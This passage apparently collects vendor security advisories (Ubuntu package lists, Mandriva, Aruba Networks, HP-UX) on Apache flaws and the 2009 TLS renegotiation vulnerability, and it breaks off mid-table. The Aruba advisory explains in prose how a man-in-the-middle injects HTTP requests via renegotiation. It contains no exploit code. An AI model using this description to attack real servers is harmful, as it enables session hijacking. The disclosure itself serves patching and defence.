http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 87876 1d45c033ec5498c092f30188cf1d481e
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 86154 52c1d8806d52fef6f43ab53662953953
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 250786 4e8e98dcba5543394ed5f07d141ce408
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 245094 a82bf04fc92b8c275b0c0f25cc81ff91
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 250110 092cf734813ae1d127d7b4f498f936c1
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 213312 98d7062a6bdb58637f7e850b76bfbc80
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 214286 a378e2e0418631cec0f398379a446172
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 154284 ce8b7bbccd359675b70426df15becfed
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 789298 11f088b18425b97367d5bc141da2ef2f
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 87384 477b6594866c8c73a8a3603e7e646c68
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.5_sparc.deb
Size/MD5: 85686 5562ea5a0e6f01ba12adda3afb65c1b0
Updated packages for Ubuntu 9.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.12-1ubuntu2.1.diff.gz
Size/MD5: 185244 1ef59f9642bd9efa35e0808ea804cd0b
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.12-1ubuntu2.1.dsc
Size/MD5: 1888 d3bfdecefdd8b1adec8ab35dcf85d2b3
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.12.orig.tar.gz
Size/MD5: 6678149 17f017b571f88aa60abebfe2945d7caf
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.12-1ubuntu2.1_all.deb
Size/MD5: 2246560 be12bcc117bf165ffd3401486186762e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.12-1ubuntu2.1_all.deb
Size/MD5: 2336 009d381342b0be5280835a46c91f01d9
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.12-1ubuntu2.1_all.deb
Size/MD5: 2374 7545a3750acea08e95bee86f6a3247e2
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.12-1ubuntu2.1_all.deb
Size/MD5: 2314 17719223d92d46821098ce178b5947d6
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.12-1ubuntu2.1_all.deb
Size/MD5: 284782 4321e3201d8e8d1a9e3c6fbe6864102b
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.12-1ubuntu2.1_all.deb
Size/MD5: 1424 7b4d96008368549d5600a8c1f64a7559
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-mpm-itk_2.2.12-1ubuntu2.1_all.deb
Size/MD5: 2366 46add3d428c97fa69a8848a3e4025bb0
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.12-1ubuntu2.1_amd64.deb
Size/MD5: 137080 91e4f72d0f1f0abe91555e1497558fc2
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.12-1ubuntu2.1_amd64.deb
Size/MD5: 138176 5fd6a5ed536306528f9f2c1a0281ad70
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.12-1ubuntu2.1_amd64.deb
Size/MD5: 156646 cfa55666363303b3f44a24fa2929bf01
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-bin_2.2.12-1ubuntu2.1_amd64.deb
Size/MD5: 1399630 82b36d57faa29a646e72a1125600c11c
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec-custom_2.2.12-1ubuntu2.1_amd64.deb
Size/MD5: 92488 ddebef9d1a537520380f85b63c512bef
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec_2.2.12-1ubuntu2.1_amd64.deb
Size/MD5: 90880 c6d163edf145da8ff6d102dc0dd1f8d7
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.12-1ubuntu2.1_i386.deb
Size/MD5: 137102 69dcd0519ca612e02102f52dcb50bf7f
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.12-1ubuntu2.1_i386.deb
Size/MD5: 138200 17221b53903d664823a55faa1ec4d9a9
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.12-1ubuntu2.1_i386.deb
Size/MD5: 155166 4347806710edff47fc051b4a68d5b448
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-bin_2.2.12-1ubuntu2.1_i386.deb
Size/MD5: 1309136 d9a7df212b315fc6f77fc87fa8eb4a04
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec-custom_2.2.12-1ubuntu2.1_i386.deb
Size/MD5: 91876 289bf732dd4750a2ce61ab121b04b079
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec_2.2.12-1ubuntu2.1_i386.deb
Size/MD5: 90316 add7f446f6b524343c0066a486dd299a
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.12-1ubuntu2.1_lpia.deb
Size/MD5: 137088 571e9f0370b5687acff25f71c4efe33e
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.12-1ubuntu2.1_lpia.deb
Size/MD5: 138192 816a6e033f02114553bbb3627b9c6f9c
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.12-1ubuntu2.1_lpia.deb
Size/MD5: 155090 af8272dc794250c30cd2f66b82486dc2
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-bin_2.2.12-1ubuntu2.1_lpia.deb
Size/MD5: 1290606 4c51de07f5a6fe9612de45369e6f35a5
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.12-1ubuntu2.1_lpia.deb
Size/MD5: 91830 06866386df811127f4fd71d6fb2a9e2a
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.12-1ubuntu2.1_lpia.deb
Size/MD5: 90312 9e68bd8111503135a4eae7265b0084ae
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.12-1ubuntu2.1_powerpc.deb
Size/MD5: 137096 61b24dbeb12d7998e5d7014c26410a99
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.12-1ubuntu2.1_powerpc.deb
Size/MD5: 138202 599898ff374bde8bfa388e2615064c5a
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.12-1ubuntu2.1_powerpc.deb
Size/MD5: 161058 fea8f5b9a80bef9c4cb3405bc37160af
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-bin_2.2.12-1ubuntu2.1_powerpc.deb
Size/MD5: 1390150 fb1a244728a509586b77d02930fcf10f
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.12-1ubuntu2.1_powerpc.deb
Size/MD5: 92400 572c3b0aa5ab717e8c4e4e8248aff1ff
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.12-1ubuntu2.1_powerpc.deb
Size/MD5: 90774 82011ebc757d31e690698cf9913e3adc
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.12-1ubuntu2.1_sparc.deb
Size/MD5: 137098 7f566dfade1678c72eac7dd923ab5987
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.12-1ubuntu2.1_sparc.deb
Size/MD5: 138202 09fbc3145d768cf1f204d47b50e21528
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.12-1ubuntu2.1_sparc.deb
Size/MD5: 159488 7cb6c81588adaee162b8c85a1f69e7a7
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-bin_2.2.12-1ubuntu2.1_sparc.deb
Size/MD5: 1297936 106b0b71f5e928c1d543973b5b1f015b
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.12-1ubuntu2.1_sparc.deb
Size/MD5: 92166 28899fe31226880dfa961d8b05e8fa43
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.12-1ubuntu2.1_sparc.deb
Size/MD5: 90554 f207de0099ed259e2af736e8c82f91c2
. USN-990-1
introduced the new RFC5746 renegotiation extension in openssl, and
completely resolves the issue.
After updating openssl, an Apache server will allow both patched and
unpatched web browsers to connect, but unpatched browsers will not be able
to renegotiate. This update introduces the new SSLInsecureRenegotiation
directive for Apache that may be used to re-enable insecure renegotiations
with unpatched web browsers. This update adds backported support
for the new RFC5746 renegotiation extension and will use it when both the
client and the server support it.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:323
http://www.mandriva.com/security/
_______________________________________________________________________
Package : apache
Date : December 7, 2009
Affected: 2008.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been found and corrected in apache:
Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c
in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to
cause a denial of service (memory consumption) via multiple calls, as
demonstrated by initial SSL client handshakes to the Apache HTTP Server
mod_ssl that specify a compression algorithm (CVE-2008-1678). Note
that this security issue does not really apply as zlib compression
is not enabled in the openssl build provided by Mandriva, but apache
is patched to address this issue anyway (conserns 2008.1 only).
Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the
mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c
in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions,
allows remote attackers to inject arbitrary web script or HTML via
wildcards in a pathname in an FTP URI (CVE-2008-2939). Note that this
security issue was initially addressed with MDVSA-2008:195 but the
patch fixing the issue was added but not applied in 2009.0.
The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not
properly handle Options=IncludesNOEXEC in the AllowOverride directive,
which allows local users to gain privileges by configuring (1) Options
Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a
.htaccess file, and then inserting an exec element in a .shtml file
(CVE-2009-1195).
The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy
module in the Apache HTTP Server before 2.3.3, when a reverse proxy
is configured, does not properly handle an amount of streamed data
that exceeds the Content-Length value, which allows remote attackers
to cause a denial of service (CPU consumption) via crafted requests
(CVE-2009-1890).
Fix a potential Denial-of-Service attack against mod_deflate or other
modules, by forcing the server to consume CPU time in compressing a
large file after a client disconnects (CVE-2009-1891).
The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in
the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13
allows remote FTP servers to cause a denial of service (NULL pointer
dereference and child process crash) via a malformed reply to an EPSV
command (CVE-2009-3094).
The mod_proxy_ftp module in the Apache HTTP Server allows remote
attackers to bypass intended access restrictions and send arbitrary
commands to an FTP server via vectors related to the embedding of these
commands in the Authorization HTTP header, as demonstrated by a certain
module in VulnDisco Pack Professional 8.11. NOTE: as of 20090903,
this disclosure has no actionable information. However, because the
VulnDisco Pack author is a reliable researcher, the issue is being
assigned a CVE identifier for tracking purposes (CVE-2009-3095).
Apache is affected by SSL injection or man-in-the-middle attacks
due to a design flaw in the SSL and/or TLS protocols. A short term
solution was released Sat Nov 07 2009 by the ASF team to mitigate
these problems. Apache will now reject in-session renegotiation
(CVE-2009-3555).
Packages for 2008.0 are being provided due to extended support for
Corporate products.
This update provides a solution to these vulnerabilities.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1678
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2939
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1191
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1890
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1891
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3095
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555
http://marc.info/?l=apache-httpd-announce&m=125755783724966&w=2
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
dd2bebdd6726d2d865331d37068a90b7 2008.0/i586/apache-base-2.2.6-8.3mdv2008.0.i586.rpm
6de9d36a91b125cc03bafe911b7a38a2 2008.0/i586/apache-devel-2.2.6-8.3mdv2008.0.i586.rpm
ab7963efad1b7951c94a24075a2070e7 2008.0/i586/apache-htcacheclean-2.2.6-8.3mdv2008.0.i586.rpm
42a53b597d5547fb88b7427cacd617a1 2008.0/i586/apache-mod_authn_dbd-2.2.6-8.3mdv2008.0.i586.rpm
1dff9d313e93c94e907d8c72348ed2e0 2008.0/i586/apache-mod_cache-2.2.6-8.3mdv2008.0.i586.rpm
b575ede2978ad47e41d355bd8b192725 2008.0/i586/apache-mod_dav-2.2.6-8.3mdv2008.0.i586.rpm
8ff3dee24d2d2d9a8d13e567cf1eaced 2008.0/i586/apache-mod_dbd-2.2.6-8.3mdv2008.0.i586.rpm
7bae541dfec14b21700878514750de83 2008.0/i586/apache-mod_deflate-2.2.6-8.3mdv2008.0.i586.rpm
19cab766a26ce53bd7e7973ed92f0db4 2008.0/i586/apache-mod_disk_cache-2.2.6-8.3mdv2008.0.i586.rpm
a1336e4ab4f282c388d7565bde4557fd 2008.0/i586/apache-mod_file_cache-2.2.6-8.3mdv2008.0.i586.rpm
6b2f2eb949977349390fa3b06cf257e7 2008.0/i586/apache-mod_ldap-2.2.6-8.3mdv2008.0.i586.rpm
3640bbef5262ec0407126e31dd5ddde3 2008.0/i586/apache-mod_mem_cache-2.2.6-8.3mdv2008.0.i586.rpm
98793747365606baabc08f22e36a0a04 2008.0/i586/apache-mod_proxy-2.2.6-8.3mdv2008.0.i586.rpm
d7fe4d88f25d2a01b0809ab5292b0999 2008.0/i586/apache-mod_proxy_ajp-2.2.6-8.3mdv2008.0.i586.rpm
4c9f48adbd0b1d45a874f06b9275ebe3 2008.0/i586/apache-mod_ssl-2.2.6-8.3mdv2008.0.i586.rpm
e5a1d9476316ccc9f183cb1ae5bbcf31 2008.0/i586/apache-modules-2.2.6-8.3mdv2008.0.i586.rpm
44f7810695a40519c68930695829f124 2008.0/i586/apache-mod_userdir-2.2.6-8.3mdv2008.0.i586.rpm
d6f666e9954422664d1f029fc147b591 2008.0/i586/apache-mpm-event-2.2.6-8.3mdv2008.0.i586.rpm
75e205ddbc9313b8d02519e57919923a 2008.0/i586/apache-mpm-itk-2.2.6-8.3mdv2008.0.i586.rpm
6d68e8fa7baccc2ad090c703fb33458e 2008.0/i586/apache-mpm-prefork-2.2.6-8.3mdv2008.0.i586.rpm
331f18ce48403472fc7f8af6d5daee8e 2008.0/i586/apache-mpm-worker-2.2.6-8.3mdv2008.0.i586.rpm
c75e69bcabc104938cb9033e591d1de8 2008.0/i586/apache-source-2.2.6-8.3mdv2008.0.i586.rpm
23fcdf29e21b0146fb5646baca2fa63b 2008.0/SRPMS/apache-2.2.6-8.3mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
3d4afe3f8da8369d80b6c195e132c5c0 2008.0/x86_64/apache-base-2.2.6-8.3mdv2008.0.x86_64.rpm
37034ee7c7eb813de2a00a6945a10248 2008.0/x86_64/apache-devel-2.2.6-8.3mdv2008.0.x86_64.rpm
ba296f9aa229a616a2c406d1a16912c3 2008.0/x86_64/apache-htcacheclean-2.2.6-8.3mdv2008.0.x86_64.rpm
77fa75d36e7a4bbe154c846e3271e7a3 2008.0/x86_64/apache-mod_authn_dbd-2.2.6-8.3mdv2008.0.x86_64.rpm
ca29e2db08b29e319f2392b46ea4c3fe 2008.0/x86_64/apache-mod_cache-2.2.6-8.3mdv2008.0.x86_64.rpm
3fbf5a0276adaa2d887a92482d81313f 2008.0/x86_64/apache-mod_dav-2.2.6-8.3mdv2008.0.x86_64.rpm
9c66e471c2d2d3e43462302d0cc6f1c9 2008.0/x86_64/apache-mod_dbd-2.2.6-8.3mdv2008.0.x86_64.rpm
05020102a26a28b96319b23e3b6e43d6 2008.0/x86_64/apache-mod_deflate-2.2.6-8.3mdv2008.0.x86_64.rpm
7191542417b30ed77334f1b8366628aa 2008.0/x86_64/apache-mod_disk_cache-2.2.6-8.3mdv2008.0.x86_64.rpm
f4177dbdcfd2e3dc8e66be731ad731c4 2008.0/x86_64/apache-mod_file_cache-2.2.6-8.3mdv2008.0.x86_64.rpm
fea417664f0a2689fa12308bd80c2fe4 2008.0/x86_64/apache-mod_ldap-2.2.6-8.3mdv2008.0.x86_64.rpm
9cf956fa426e6bdf6497337b6e26a2ab 2008.0/x86_64/apache-mod_mem_cache-2.2.6-8.3mdv2008.0.x86_64.rpm
0d9d04ca878bb3f19f4764152da42d82 2008.0/x86_64/apache-mod_proxy-2.2.6-8.3mdv2008.0.x86_64.rpm
dbbcd75dd83779f54f98fa3e16b59f13 2008.0/x86_64/apache-mod_proxy_ajp-2.2.6-8.3mdv2008.0.x86_64.rpm
dce8db6742ba28a71e18b86bb38688c8 2008.0/x86_64/apache-mod_ssl-2.2.6-8.3mdv2008.0.x86_64.rpm
2ff69d6e9c2cd3250f6746d4a7d921fd 2008.0/x86_64/apache-modules-2.2.6-8.3mdv2008.0.x86_64.rpm
f298827d4dfa631a77907f7f5733fa29 2008.0/x86_64/apache-mod_userdir-2.2.6-8.3mdv2008.0.x86_64.rpm
6f02fb080e308ca0826fdb1ef00a1489 2008.0/x86_64/apache-mpm-event-2.2.6-8.3mdv2008.0.x86_64.rpm
b886d30d73c60a515b3ed36d7f186378 2008.0/x86_64/apache-mpm-itk-2.2.6-8.3mdv2008.0.x86_64.rpm
62d7754a5aa7af596cc06cd540d4025f 2008.0/x86_64/apache-mpm-prefork-2.2.6-8.3mdv2008.0.x86_64.rpm
d3438e0967978e580be896bd85f1d953 2008.0/x86_64/apache-mpm-worker-2.2.6-8.3mdv2008.0.x86_64.rpm
e72af335ec7c3c02b5a494fbd6e99e0e 2008.0/x86_64/apache-source-2.2.6-8.3mdv2008.0.x86_64.rpm
23fcdf29e21b0146fb5646baca2fa63b 2008.0/SRPMS/apache-2.2.6-8.3mdv2008.0.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFLHQcamqjQ0CJFipgRAsJgAKDf5oc5UbEz3j+qsMn3tL6F8cujygCfY+cu
MUj4lK2Wsb+qzbv2V+Ih30U=
=VdZS
-----END PGP SIGNATURE-----
.
Additionally the NSPR package has been upgraded to 4.8.4 that brings
numerous upstream fixes.
This update provides the latest versions of NSS and NSPR libraries
and for which NSS is not vulnerable to this attack.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Aruba Networks Security Advisory
Title: TLS Protocol Session Renegotiation Security Vulnerability
Aruba Advisory ID: AID-020810
Revision: 1.0
For Public Release on 02/08/2010
+----------------------------------------------------
SUMMARY
This advisory addresses the renegotiation related vulnerability
disclosed recently in Transport Layer Security protocol [1][2].
The only ArubaOS component that seems affected by this issue is the
HTTPS WebUI administration interface. If a client browser (victim) is
configured to authenticate to the WebUI over HTTPS using a client
certificate, an attacker can potentially use the victim's credentials
temporarily to execute arbitrary HTTP request for each initiation of an
HTTPS session from the victim to the WebUI. This would happen without
any HTTPS/TLS warnings to the victim. This condition can essentially be
exploited by an attacker for command injection in beginning of a HTTPS
session between the victim and the ArubaOS WebUI.
ArubaOS itself does not initiate TLS renegotiation at any point and
hence is only vulnerable to scenario where a client explicitly requests
TLS renegotiation. Captive Portal users do not seem vulnerable to this
issue unless somehow client certificates are being used to authenticate
captive portal users.
AFFECTED ArubaOS VERSIONS
2.5.6.x, 3.3.2.x, 3.3.3.x, 3.4.0.x, 3.4.1.x, RN 3.1.x, 3.3.2.x-FIPS,
2.4.8.x-FIPS
CHECK IF YOU ARE VULNERABLE
The only ArubaOS component that seems affected by this issue is the
HTTPS WebUI administration interface. ArubaOS is vulnerable only if its
configuration permits WebUI administration interface clients to connect
using either username/password or client certificates. If only one of
the two authentication method is allowed, this issue does not seem to apply.
Check if the following line appears in your configuration:
web-server mgmt-auth username/password certificate
If the exact line does not appear in the configuration, this issue does
not apply.
DETAILS
An industry wide vulnerability was discovered in TLS protocol's
renegotiation feature, which allows a client and server who already have
a TLS connection to negotiate new session parameters and generate new
key material. Renegotiation is carried out in the existing TLS
connection. However there is no cryptographic binding between the
renegotiated TLS session and the original TLS session. An attacker who
has established MITM between client and server may be able to take
advantage of this and inject arbitrary data into the beginning of the
application protocol stream protected by TLS. Specifically arbitrary
HTTP requests can be injected in a HTTPS session where attacker (MITM)
blocks HTTPS session initiation between client and server, establishes
HTTPS session with the server itself, injects HTTP data and initiates
TLS renegotiation with the server. Then attacker allows the
renegotiation to occur between the client and the server. After
successful HTTPS session establishment with the server, now the client
sends its HTTP request along with its HTTP credentials (cookie) to the
server. However due to format of attacker's injected HTTP data, the
client's HTTP request is not processed, rather the attacker's HTTP
request gets executed with credentials of the client. The attacker is
not able to view the results of the injected HTTP request due to the
fact that data between the client and the server is encrypted over
HTTPS.
ArubaOS itself does not initiate TLS renegotiation at any point. The only ArubaOS component that seems affected
by this issue is the HTTPS WebUI administration interface.
Pre-requisites for this attack :
1. The attacker must be able to establish a MITM between the client and
the server (ArubaOS WebUI).
2. The attacker must be able to establish a successful HTTPS session
with the server (ArubaOS WebUI)
3. ArubaOS must be configured to allow certificate based HTTPS
authentication for WebUI clients (client certs).
Captive Portal users do not seem vulnerable to this issue unless somehow
client certificates are being used to authenticate captive portal users.
CVSS v2 BASE METRIC SCORE: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
WORKAROUNDS
Aruba Networks recommends that all customers apply the appropriate
patch(es) as soon as practical. However, in the event that a patch
cannot immediately be applied, the following steps will help to mitigate
the risk:
- - - Disable certificate based HTTPS authentication (and only allow
username-password based authentication) for WebUI clients. Client's
username-password authentication POST request will prohibit attacker's
injected HTTP data from executing with client's cookie.
CLI command: web-server mgmt-auth username/password
- - - Permit certificate based HTTPS authentication ONLY and disable
username-password based authentication to WebUI. This will prohibit
attacker from establishing a HTTPS session with ArubaOS (for MITM)
without a valid client cert.
CLI command: web-server mgmt-auth certificate
Note: This step won't stop command injection from attackers who have
valid client certificates but their assigned management role privileges
are lower than that of the admin. This attack may allow them to run
commands at higher privilege than what is permitted in their role.
- - - Do not expose the Mobility Controller administrative interface to
untrusted networks such as the Internet.
SOLUTION
Aruba Networks recommends that all customers apply the appropriate
patch(es) as soon as practical.
The following patches have the fix (any newer patch will also have the fix):
- - - - 2.5.6.24
- - - - 3.3.2.23
- - - - 3.3.3.2
- - - - 3.4.0.7
- - - - 3.4.1.1
- - - - RN 3.1.4
Please contact Aruba support for obtaining patched FIPS releases.
Please note: We highly recommend that you upgrade your Mobility
Controller to the latest available patch on the Aruba support site
corresponding to your currently installed release.
REFERENCES
[1] http://extendedsubset.com/?p=8
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555
+----------------------------------------------------
OBTAINING FIXED FIRMWARE
Aruba customers can obtain the firmware on the support website:
http://www.arubanetworks.com/support.
Aruba Support contacts are as follows:
1-800-WiFiLAN (1-800-943-4526) (toll free from within North America)
+1-408-754-1200 (toll call from anywhere in the world)
e-mail: support(at)arubanetworks.com
Please, do not contact either "wsirt(at)arubanetworks.com" or
"security(at)arubanetworks.com" for software upgrades.
EXPLOITATION AND PUBLIC ANNOUNCEMENTS
This vulnerability will be announced at
Aruba W.S.I.R.T. Advisory:
http://www.arubanetworks.com/support/alerts/aid-020810.txt
SecurityFocus Bugtraq
http://www.securityfocus.com/archive/1
STATUS OF THIS NOTICE: Final
Although Aruba Networks cannot guarantee the accuracy of all statements
in this advisory, all of the facts have been checked to the best of our
ability. Aruba Networks does not anticipate issuing updated versions of
this advisory unless there is some material change in the facts. Should
there be a significant change in the facts, Aruba Networks may update
this advisory.
A stand-alone copy or paraphrase of the text of this security advisory
that omits the distribution URL in the following section is an uncontrolled
copy, and may lack important information or contain factual errors.
DISTRIBUTION OF THIS ANNOUNCEMENT
This advisory will be posted on Aruba's website at:
http://www.arubanetworks.com/support/alerts/aid-020810.txt
Future updates of this advisory, if any, will be placed on Aruba's worldwide
website, but may or may not be actively announced on mailing lists or
newsgroups. Users concerned about this problem are encouraged to check the
above URL for any updates.
REVISION HISTORY
Revision 1.0 / 02-08-2010 / Initial release
ARUBA WSIRT SECURITY PROCEDURES
Complete information on reporting security vulnerabilities in Aruba Networks
products, obtaining assistance with security incidents is available at
http://www.arubanetworks.com/support/wsirt.php
For reporting *NEW* Aruba Networks security issues, email can be sent to
wsirt(at)arubanetworks.com or security(at)arubanetworks.com. For sensitive
information we encourage the use of PGP encryption. Our public keys can be
found at
http://www.arubanetworks.com/support/wsirt.php
(c) Copyright 2010 by Aruba Networks, Inc.
This advisory may be redistributed freely after the release date given at
the top of the text, provided that redistributed copies are complete and
unmodified, including all date and version information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.14 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAktwksYACgkQp6KijA4qefXErQCeKJW3YU3Nl7JY4+2Hp2zqM3bN
bWAAoJWQT+yeWX2q+02hNEwHWQtGf1YP
=CrHf
-----END PGP SIGNATURE-----
. Transport Layer Security (TLS) is a protocol for ensuring the privacy of communication applications and their users over the Internet. Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01963123
Version: 1
HPSBUX02498 SSRT090264 rev.1 - HP-UX Running Apache, Remote Unauthorized Data Injection, Denial of
Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-12-21
Last Updated: 2009-12-21
Potential Security Impact: Remote unauthorized data injection, Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running Apache v2.0.59.12 and earlier. The
vulnerability could be exploited remotely to inject unauthorized data or to create a Denial of Service (DoS).
References: CVE-2009-3555
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running Apache v2.0.59.12 and previous.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2009-3555 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following temporary software updates to resolve the vulnerability.
NOTE: The vulnerability is resolved in OpenSSL 0.9.8l. HP-UX Apache v2.0.59.X versions use statically linked
libraries. HP-UX Apache v2.0.59.13 is compiled with OpenSSL 0.9.8l. Other versions of HP-UX Apache require the
HP-UX OpenSSL packages recommended in HPSBUX02482 SSRT090249, available here
http://www.itrc.hp.com/service/cki/secBullArchive.do
To review previously published Security Bulletins visit http://www.itrc.hp.com/service/cki/secBullArchive.do
The depots are available are available using ftp.
Host / Account / Password
ftp.usa.hp.com / sb02498 / Secure12
HP-UX Release / Temporary Depot name / SHA-1 Sum
B.11.11 (IPv4 and IPv6) / Apache 2.0.59.13 PA-64-32-1111.depot /
3B6BE547403C28926482192408D5D5AB603A403D
B.11.23 PA-32 / Apache 2.0.59.13 IA-PA-32-1123.depot /
4809BAF0F83F78F60B7EC73FAF584D221B1CB4A7
B.11.23 IA-64 / Apache 2.0.59.13 IA-PA-64-1123.depot /
1D65F7D49883399F4D202E16754CF7DAE71E3B47
B.11.31 PA-32 / Apache 2.0.59.13 IA-PA-32-1131.depot /
